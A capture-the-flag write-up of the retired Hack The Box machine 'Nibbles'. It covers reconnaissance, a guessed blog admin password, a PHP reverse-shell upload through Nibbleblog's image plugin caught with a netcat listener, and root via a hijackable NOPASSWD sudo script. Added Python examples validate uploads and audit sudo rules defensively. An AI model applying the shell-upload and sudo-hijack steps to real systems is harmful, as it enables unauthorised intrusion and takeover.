| Name: | Nibbles |
|---|---|
| Release Date: | 13 Jan 2018 |
| Retire Date: | 30 Jun 2018 |
| OS: | Linux |
| Base Points: | Easy - Retired [0] |
| Rated Difficulty: | |
| Radar Graph: | |
| | m0noc 00 days, 02 hours, 20 mins, 53 seconds |
| | m0noc 00 days, 02 hours, 24 mins, 34 seconds |
| Creator: | mrb3n |
| CherryTree File: | CherryTree - Remove the .txt extension |
Again, we start with `nmap -sC -sV -oA ./nibbles 10.10.10.75`:

```
$ nmap -sC -sV -Pn -oA ./nibbles 10.10.10.75
Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-09 09:11 EDT
Nmap scan report for 10.10.10.75
Host is up (0.080s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 c4:f8:ad:e8:f8:04:77:de:cf:15:0d:63:0a:18:7e:49 (RSA)
|   256 22:8f:b1:97:bf:0f:17:08:fc:7e:2c:8f:e9:77:3a:48 (ECDSA)
|_  256 e6:ac:27:a3:b5:a9:f1:12:3c:34:a5:5d:5b:eb:3d:e9 (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.51 seconds
```
Let's start with the HTTP side of life. The starting page is just a "Hello World" plaintext, but the source code shows us that there is something at /nibbleblog.
Nibble blog is exactly that. A blog, in this case with no posts. Let's gobuster it and see what's there.
```
$ gobuster dir -w /usr/share/dirb/wordlists/big.txt -u http://10.10.10.75/nibbleblog
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.10.75/nibbleblog
[+] Threads:        10
[+] Wordlist:       /usr/share/dirb/wordlists/big.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2020/04/09 09:44:54 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/README (Status: 200)
/admin (Status: 301)
/content (Status: 301)
/languages (Status: 301)
/plugins (Status: 301)
/themes (Status: 301)
===============================================================
2020/04/09 09:47:04 Finished
===============================================================
```
We found a few directories to look through. If we gobuster the /content folder we also find a /content/private. Inside of that folder we find a users.xml. Now we have a username of admin! We also see that a login blacklist is in effect. So, we can't just hammer away at the login page (/nibbleblog/admin.php). To be honest, getting in was a guess. We are dealing with a Nibble Blog and the title is Nibbles. So, try admin:nibbles.
From the README file, we can find the version of Nibbleblog that is running (v4.0.3). A quick searchsploit finds an arbitrary file upload.

```
$ searchsploit nibbleblog
------------------------------------------------------- ----------------------------------
 Exploit Title                                         |  Path
                                                       | (/usr/share/exploitdb/)
------------------------------------------------------- ----------------------------------
 Nibbleblog 3 - Multiple SQL Injections                | exploits/php/webapps/35865.txt
 Nibbleblog 4.0.3 - Arbitrary File Upload (Metasploit) | exploits/php/remote/38489.rb
------------------------------------------------------- ----------------------------------
Shellcodes: No Result
```
Again, I dislike metasploit (it makes us lazy. Plus, you can't use it on OSCP), so let's see if there's another way to get the same results. We find that "other way" here. When we navigate to the Plugins page, we find that the "My image" plugin is already installed. We just need to configure it.
So, we'll use pentest monkey's php-reverse-shell.
Now, we start a netcat listener (`nc -lvnp 1234`) and navigate to http://10.10.10.75/nibbleblog/content/private/plugins/my_image/. We don't see a shell.php, but we do see an image.php. When we hit that one, we get a shell as nibbler.
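What made this work is that the My image plugin wrote whatever was uploaded under the web root with its original extension, and Apache happily executed the result. The validation below is an added example from the defender's side, not Nibbleblog's plugin code: it accepts a file only if the extension is on a whitelist, the leading bytes match that type, and no PHP open tag appears anywhere in the body, and it then stores the file under a server-chosen name rather than the client's. The file names and byte strings in it are constructed samples, and the function names are my own.

```python
"""Validate an "image" upload before it is written under the web root.

Added example, not Nibbleblog's plugin code. It shows the checks whose
absence let a .php file be stored as image.php and served: an extension
whitelist, agreement between extension and magic bytes, a scan for PHP
tags, and a server-chosen storage name."""
import os
import secrets

# Allowed extensions and the bytes a file of that type must start with.
IMAGE_MAGIC = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "jpeg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Open tags PHP would honour if the file ever reached the interpreter.
PHP_MARKERS = (b"<?php", b"<?=", b"<script language=\"php\"")

# Constructed samples: a harmless placeholder "payload" and a bare PNG header.
PHP_PAYLOAD = b"<?php echo 'constructed placeholder'; ?>"
PNG_STUB = IMAGE_MAGIC["png"] + b"\x00" * 16


def validate_image_upload(filename, data):
    """Return (accepted, reason) for a would-be image upload."""
    base = os.path.basename(filename.replace("\\", "/"))  # ignore client path parts
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()       # only the last extension counts
    if ext not in IMAGE_MAGIC:
        return False, f"extension {ext!r} not allowed"
    if not data.startswith(IMAGE_MAGIC[ext]):
        return False, f"content is not a {ext} file"
    if any(marker in data.lower() for marker in PHP_MARKERS):
        return False, "PHP tag embedded in image data"
    return True, "ok"


def storage_name(filename):
    """Server-chosen name: random stem plus the validated extension, so the
    client's name (shell.php, image.php, ...) never reaches the disk."""
    ext = os.path.basename(filename).rsplit(".", 1)[1].lower()
    return f"{secrets.token_hex(8)}.{ext}"


def demo():
    """Run the validator over the constructed cases and return the verdicts."""
    cases = {
        "shell.php": PHP_PAYLOAD,             # what the writeup uploaded
        "shell.png": PHP_PAYLOAD,             # renamed: extension ok, magic bytes wrong
        "logo.png": PNG_STUB + PHP_PAYLOAD,   # polyglot: valid header, PHP tail
        "photo.png": PNG_STUB,                # looks like a genuine image
    }
    return {name: validate_image_upload(name, data) for name, data in cases.items()}


if __name__ == "__main__":
    for name, (accepted, reason) in demo().items():
        print(f"{name:10} -> {'accept' if accepted else 'reject'}: {reason}")
```

Even with these checks in place, the upload directory should have script execution disabled in the web server configuration; content validation is a second line of defence, not the only one.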
Next, mainly as good practice, we migrate LinEnum.sh over to the target box and run it with the -t flag. As always, the results are in the attached CTB file above. LinEnum usage is good practice for discovering possible privesc avenues. Like in this situation we find something interesting in the SUDO section (lines 138 - 143).
```
[+] We can sudo without supplying a password!
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
```
We can run monitor.sh as root with no password. Except, checking /home/nibbler shows that personal doesn't exist, let alone personal/stuff. Make them: `mkdir personal` and `mkdir personal/stuff`. Then it's just a matter of creating our own monitor.sh and running it with sudo. Bash does exist on the system, so a simple `bash -i` should work. After running it with sudo, we're finished.
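LinEnum flagged the rule, but the reason it is exploitable is not the NOPASSWD itself; it is that the target script did not exist and its nearest existing parent, /home/nibbler, belonged to the very user allowed to run it. The audit below is an added example (not part of LinEnum or of this writeup) that parses `sudo -l` output, here the exact text shown above, and reports for each NOPASSWD target whether it is missing under a user-writable directory, writable itself, or sitting in a directory the user can write. `demo()` rebuilds the situation in a scratch directory so the check runs offline; the `root` parameter exists only for that, and the function names are my own.

```python
"""Audit `sudo -l` output for NOPASSWD rules the invoking user can hijack.

Added example (not LinEnum's own check). The sample text is the sudo
output shown in the writeup; the filesystem checks run against a scratch
directory built by demo(), never against a real host."""
import os
import re
import stat
import tempfile

SAMPLE_SUDO_L = r"""
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
"""

RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s+NOPASSWD:\s*(?P<cmds>.+)$")


def parse_nopasswd(text):
    """Return [(runas, command_path)] for every NOPASSWD rule in `sudo -l` output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if not m:
            continue
        for cmd in m.group("cmds").split(","):
            path = cmd.strip().split()[0]      # keep the program, drop its arguments
            rules.append((m.group("runas").strip(), path))
    return rules


def writable_by(path, uid, gids):
    """True if a process with this uid and group set could write `path`."""
    st = os.stat(path)
    if uid == 0:                               # root writes anywhere
        return True
    if st.st_uid == uid and st.st_mode & stat.S_IWUSR:
        return True
    if st.st_gid in gids and st.st_mode & stat.S_IWGRP:
        return True
    return bool(st.st_mode & stat.S_IWOTH)


def first_existing_ancestor(path):
    """Walk up a missing path until a component exists: that directory is
    where the user would have to create the missing target."""
    while not os.path.exists(path):
        path = os.path.dirname(path)
    return path


def classify(path, uid, gids, root=""):
    """Explain why the rule's target is (or is not) controllable by the user.
    `root` is prefixed to `path` only for offline demos against a scratch tree."""
    if path == "ALL":
        return "unrestricted: any command"
    if not path.startswith("/"):
        return "non-absolute command spec"
    full = root + path
    if not os.path.exists(full):
        anchor = first_existing_ancestor(full)
        shown = anchor[len(root):] or "/"
        if writable_by(anchor, uid, gids):
            return "missing target; user can create it under " + shown
        return "missing target (nearest existing parent not writable)"
    if writable_by(full, uid, gids):
        return "target writable by user"
    if writable_by(os.path.dirname(full), uid, gids):
        return "target directory writable by user (file can be replaced)"
    return "ok"


def audit(sudo_l_text, uid, gids, root=""):
    """Return [(runas, path, verdict)] for each NOPASSWD rule."""
    return [(runas, path, classify(path, uid, gids, root))
            for runas, path in parse_nopasswd(sudo_l_text)]


def demo():
    """Rebuild the Nibbles situation offline: /home/nibbler exists and belongs
    to the invoking user, but personal/stuff/monitor.sh does not."""
    with tempfile.TemporaryDirectory() as tmp:
        home = os.path.join(tmp, "home", "nibbler")
        os.makedirs(home)
        owner = os.stat(home).st_uid           # stands in for the nibbler uid
        return audit(SAMPLE_SUDO_L, owner, set(), root=tmp)


if __name__ == "__main__":
    for runas, path, verdict in demo():
        print(f"({runas}) NOPASSWD: {path} -> {verdict}")
```

On a real host you would feed it the output of `sudo -l` for the account under review with that account's uid and groups; any verdict other than `ok` means the rule grants more than the sudoers author intended, and the fix is to point the rule at a root-owned script in a root-owned directory.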
Grab your flags!